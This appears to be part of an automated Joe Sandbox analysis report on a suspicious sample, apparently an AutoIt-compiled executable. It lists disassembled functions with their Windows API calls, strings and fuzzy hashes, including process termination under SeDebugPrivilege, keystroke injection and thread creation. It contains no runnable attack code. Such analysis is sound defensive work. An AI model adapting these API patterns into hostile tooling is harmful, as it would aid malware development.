Part of subcall function 00E71DB3: GetWindowRect.USER32(?,?), ref: 00E71E1D
Part of subcall function 00E71DB3: ScreenToClient.USER32(?,?), ref: 00E71E45

GetDC.USER32 ref: 00EACF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EACF95
SelectObject.GDI32(00000000,00000000), ref: 00EACFA3
SelectObject.GDI32(00000000,00000000), ref: 00EACFB8
ReleaseDC.USER32(?,00000000), ref: 00EACFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EAD04B

Strings

U, xrefs: 00EACF20

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 09488a041c08ddcaa5240c03ae2eb591abf45572cb0b500eca8b30f6024a0582
Instruction ID: 9cf75e779a09f8e8eeef9cb9278aa6bc52124556d2040424ad7d526b21ecba72
Opcode Fuzzy Hash: 09488a041c08ddcaa5240c03ae2eb591abf45572cb0b500eca8b30f6024a0582
Instruction Fuzzy Hash: 2771A334504209DFCF218F64CC84AFA7BB6FF4E364F24926AEE55BA265C7319841DB60

Function 00EFC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

Part of subcall function 00E72344: GetCursorPos.USER32(?), ref: 00E72357
Part of subcall function 00E72344: ScreenToClient.USER32(00F367B0,?), ref: 00E72374
Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000001), ref: 00E72399
Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000002), ref: 00E723A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00EFC2E4
ImageList_EndDrag.COMCTL32 ref: 00EFC2EA
ReleaseCapture.USER32 ref: 00EFC2F0
SetWindowTextW.USER32(?,00000000), ref: 00EFC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EFC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00EFC48F

Strings

@GUI_DROPID, xrefs: 00EFC3E1
@GUI_DRAGFILE, xrefs: 00EFC424

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: e56cdee118b6d25f58ecb671f45ef5eabd172c3de082e0578a9987042f2d2729
Instruction ID: cc68926f0dce6d5fe7bcc6b3b0c27cd49bceea9356e0c7cdd35596fd6aba611d
Opcode Fuzzy Hash: e56cdee118b6d25f58ecb671f45ef5eabd172c3de082e0578a9987042f2d2729
Instruction Fuzzy Hash: E351AE70204308AFD714EF20C955F7A7BE5EF88314F10852DF695AB2E2CB71A948DB52

Function 00EE8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EFF910), ref: 00EE903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EFF910), ref: 00EE9071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EE91EB
SysFreeString.OLEAUT32(?), ref: 00EE9215

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 7d72b49ac797f2f9eef6439658562c92d120e2bf1e50098ad34845d28a95eff2
Instruction ID: 480cfd1caaaa30bd5fc30ea6611c09b72bff4c2df1599619fa81bd73bde1789d
Opcode Fuzzy Hash: 7d72b49ac797f2f9eef6439658562c92d120e2bf1e50098ad34845d28a95eff2
Instruction Fuzzy Hash: DBF11771A00209EFDB04DF95C888EAEB7B9FF89315F109059F915BB292DB31AE45CB50

Function 00EEF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EEF9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EEFD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EEFD90
CloseHandle.KERNEL32(?), ref: 00EEFDBF
CloseHandle.KERNEL32(?), ref: 00EEFE36

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 77b6cd6fb8e8ab6024e032eaeb34727622ebbbb4f347f4a1456b9b584284fdc1
Instruction ID: 4581e4662996ba89fb1981c623fb242b4dfe0af17dbbec16d9cf60ec8c0d80d6
Opcode Fuzzy Hash: 77b6cd6fb8e8ab6024e032eaeb34727622ebbbb4f347f4a1456b9b584284fdc1
Instruction Fuzzy Hash: B3E1D331204385DFCB14EF25C881B6ABBE1AF84354F14956DF899AB3A2DB31EC45CB52

Function 00ED4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED38D3,?), ref: 00ED48C7

Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED38D3,?), ref: 00ED48E0

Part of subcall function 00ED4CD3: GetFileAttributesW.KERNEL32(?,00ED3947), ref: 00ED4CD4

lstrcmpiW.KERNEL32(?,?), ref: 00ED4FE2
_wcscmp.LIBCMT ref: 00ED4FFC
MoveFileW.KERNEL32(?,?), ref: 00ED5017

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: d8ca6fc35e73e466aa91394828f1aa87c2252e9b217fd51fe42bb29727457af6
Instruction ID: 5e53962c27c090f80e207ed1c8c4215240bb3865bdce0cbdc8a23d0845172f8c
Opcode Fuzzy Hash: d8ca6fc35e73e466aa91394828f1aa87c2252e9b217fd51fe42bb29727457af6
Instruction Fuzzy Hash: 9E5176B25087859BC724EB60C8819DFB3DCEF84340F10592FF289E3191EF75A5898766

Function 00EF88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EF896E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 211efd3f82ddf4d083046f8f794a7f39e49a4616ea4c0b070024068cbdb101ea
Instruction ID: 7162fd67fc240092cd8aa32f3b64522c13c83cb1a62d0cbfd2cf3c0a1d8e4275
Opcode Fuzzy Hash: 211efd3f82ddf4d083046f8f794a7f39e49a4616ea4c0b070024068cbdb101ea
Instruction Fuzzy Hash: 9851AF30A0064CBFDF249F248E85BB97BA5EF04364FA06116F715F61A1DF71A990DB81

Function 00E72B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EAC547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EAC569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EAC581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EAC59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EAC5C0
DestroyIcon.USER32(00000000), ref: 00EAC5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EAC5EC
DestroyIcon.USER32(?), ref: 00EAC5FB

Part of subcall function 00EFA71E: DeleteObject.GDI32(00000000), ref: 00EFA757

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 2d73f668cf6ace962b0243676f1f69eec2b92092b4a8103d25736fed549ec67e
Instruction ID: 80cae0771693bc66061e210061972b9531a5eef069793ffe90b8bd77abc3698b
Opcode Fuzzy Hash: 2d73f668cf6ace962b0243676f1f69eec2b92092b4a8103d25736fed549ec67e
Instruction Fuzzy Hash: A9516970A00209AFDB20DF25CC45BAA77E5EF59314F10952DFA06EB2A0DB70ED90DB50

Function 00EC9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ECAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECAE77
Part of subcall function 00ECAE57: GetCurrentThreadId.KERNEL32 ref: 00ECAE7E
Part of subcall function 00ECAE57: AttachThreadInput.USER32(00000000,?,00EC9B65,?,00000001), ref: 00ECAE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EC9B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00EC9B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EC9BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EC9BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EC9BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EC9BDD

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: b4a789889ab1945b7c4fefce8cd6ac2aa069068dffe34d7c96f40b10b10a9257
Instruction ID: 424d0f42d744776db48f8e2b8a8d0eb74869b71f3ac4c99125d0f1928c0366f9
Opcode Fuzzy Hash: b4a789889ab1945b7c4fefce8cd6ac2aa069068dffe34d7c96f40b10b10a9257
Instruction Fuzzy Hash: F3112172900208BEF7106B22DC8DFAA3B2CEF8C755F110429F204BB0A1C9F35C51DAA4

Function 00EC8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E0C
HeapAlloc.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EC8A84,00000B00,?,?), ref: 00EC8E28
GetCurrentProcess.KERNEL32(?,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E30
DuplicateHandle.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EC8A84,00000B00,?,?), ref: 00EC8E43
GetCurrentProcess.KERNEL32(00EC8A84,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E4B
DuplicateHandle.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E4E
CreateThread.KERNEL32(00000000,00000000,00EC8E74,00000000,00000000,00000000), ref: 00EC8E68

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 87cc7c7e1d2890e38dc370deb3e7cb0a7a9c3f5809e0a5b5aba462e9022f2f6f
Instruction ID: 08f2421a0396cff254ee8a32df7807bcdd7efa2e4ad3d51e0b2b1a4eff7567f0
Opcode Fuzzy Hash: 87cc7c7e1d2890e38dc370deb3e7cb0a7a9c3f5809e0a5b5aba462e9022f2f6f
Instruction Fuzzy Hash: 1001AC75641304FFE610AB65DD89F673B6CEF89711F404421FA05EB2A2CA71D814CA20

Function 00EE9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EE947C
VariantInit.OLEAUT32(?), ref: 00EE954D
VariantInit.OLEAUT32(?), ref: 00EE964E
VariantClear.OLEAUT32(?), ref: 00EE9658
VariantClear.OLEAUT32(?), ref: 00EE96B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 00EE94DD, 00EE960B, 00EE96C3
Incorrect Object type in FOR..IN loop, xrefs: 00EE9631

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 96aab9ddc18cf2c4b5af86471c9e47052bfc8cc86074c783457e66376f7f9606
Instruction ID: 4b852b4fbefcd46ecedf91398f8bc85c687b44140fbbdb395eed8c0c3ead1992
Opcode Fuzzy Hash: 96aab9ddc18cf2c4b5af86471c9e47052bfc8cc86074c783457e66376f7f9606
Instruction Fuzzy Hash: 1091BD71A00259ABDF24DFA6C848FAEB7F8EF85314F10915AF515BB282D7709905CFA0

Function 00EE9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00EC7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?,?,00EC799D), ref: 00EC766F
Part of subcall function 00EC7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC768A
Part of subcall function 00EC7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC7698
Part of subcall function 00EC7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?), ref: 00EC76A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00EE9B1B
_memset.LIBCMT ref: 00EE9B28
_memset.LIBCMT ref: 00EE9C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00EE9C97
CoTaskMemFree.OLE32(?), ref: 00EE9CA2

Strings

NULL Pointer assignment, xrefs: 00EE9CF0

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: fec4252f05666f638615e22035c4e3f54c67176b0e70eb34cb47b09474515f0f
Instruction ID: 0a70f6d2744ff386f9ed364ebc4fe0e3838d73fabbbb82c35b7c4bb0e50e81a4
Opcode Fuzzy Hash: fec4252f05666f638615e22035c4e3f54c67176b0e70eb34cb47b09474515f0f
Instruction Fuzzy Hash: 3D912771D0022DABDB10DFA5DC85ADEBBF8EF08710F20916AE519B7241DB719A45CFA0

Function 00EF6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EF7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 00EF70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EF70C1
_wcscat.LIBCMT ref: 00EF711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00EF7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EF7161

Strings

SysListView32, xrefs: 00EF7065

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 883bb713ecfedd1da34efdb3bd73e45d50590a1528e068268d8dfbe84a303baf
Instruction ID: 5072cb75653128cc2ba8f077a9be24cc1f5234b9452aa5f6c9d047562ada2442
Opcode Fuzzy Hash: 883bb713ecfedd1da34efdb3bd73e45d50590a1528e068268d8dfbe84a303baf
Instruction Fuzzy Hash: 64417071A04308AFDB219F64CC85BFA77E8EF08354F10556AFA84E6191D6719D848B60

Function 00EEEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00ED3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00ED3EB6
Part of subcall function 00ED3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00ED3EC4
Part of subcall function 00ED3E91: CloseHandle.KERNEL32(00000000), ref: 00ED3F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEECB8
GetLastError.KERNEL32 ref: 00EEECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00EEED77
GetLastError.KERNEL32(00000000), ref: 00EEED82
CloseHandle.KERNEL32(00000000), ref: 00EEEDB7

Strings

SeDebugPrivilege, xrefs: 00EEECD6

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 7c03ccd9cb271d1462a502d409fb75e4d0e2c1408289e754b5c030e8043ba719
Instruction ID: e2c6d2e42080952b5e1402f9c0fac3727fe1c3c7dcf371ea86bae430c12ba8fd
Opcode Fuzzy Hash: 7c03ccd9cb271d1462a502d409fb75e4d0e2c1408289e754b5c030e8043ba719
Instruction Fuzzy Hash: 1141AB712002019FDB15EF25CC95F6EB7E1AF80714F089469F94AAB3C3DB75A815CB92

Function 00ED3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00ED32C5

Strings

question, xrefs: 00ED327E
warning, xrefs: 00ED32AE
blank, xrefs: 00ED3247
stop, xrefs: 00ED3296
info, xrefs: 00ED3266

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 144d083dfb4fa72c46d520cd74cc34e4f848d6580361b5ab64cbd3bfbe3b1d82
Instruction ID: 4549dc2972f6246236d288e5234d31fb2389f6bc8b3e786d3c879fc8c114cac5
Opcode Fuzzy Hash: 144d083dfb4fa72c46d520cd74cc34e4f848d6580361b5ab64cbd3bfbe3b1d82
Instruction Fuzzy Hash: 1F112B31A09356BB9B016A75EC42CAFB3DCDF19374F20102BF900B63D1D6629B4249A7

Function 00ED4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ED454E
LoadStringW.USER32(00000000), ref: 00ED4555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ED456B
LoadStringW.USER32(00000000), ref: 00ED4572
_wprintf.LIBCMT ref: 00ED4598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ED45B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00ED4593

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
